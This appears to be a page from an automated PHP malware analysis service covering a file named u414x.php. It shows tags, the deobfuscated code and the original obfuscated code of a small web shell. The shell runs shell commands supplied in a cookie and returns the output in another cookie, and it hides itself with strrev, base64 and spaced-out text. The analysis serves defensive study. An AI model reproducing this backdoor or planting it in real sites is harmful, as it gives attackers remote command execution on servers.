PHP Malware Analysis

Back to list

Filename: u414x.php

Tags

Encoding
  • base64_decode
  • base64_encode
Execution
  • system

Deobfuscated code

<?php

$b = "base64_decode";
eval /* PHPDeobfuscator eval output */ {
    if (isset($_COOKIE['cm'])) {
        ob_start();
        system(base64_decode($_COOKIE['cm']) . ' 2>&1');
        setcookie($_COOKIE['cn'], $_COOKIE['cp'] . base64_encode(ob_get_contents()) . $_COOKIE['cp']);
        ob_end_clean();
    }
};


Original code

<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = ")));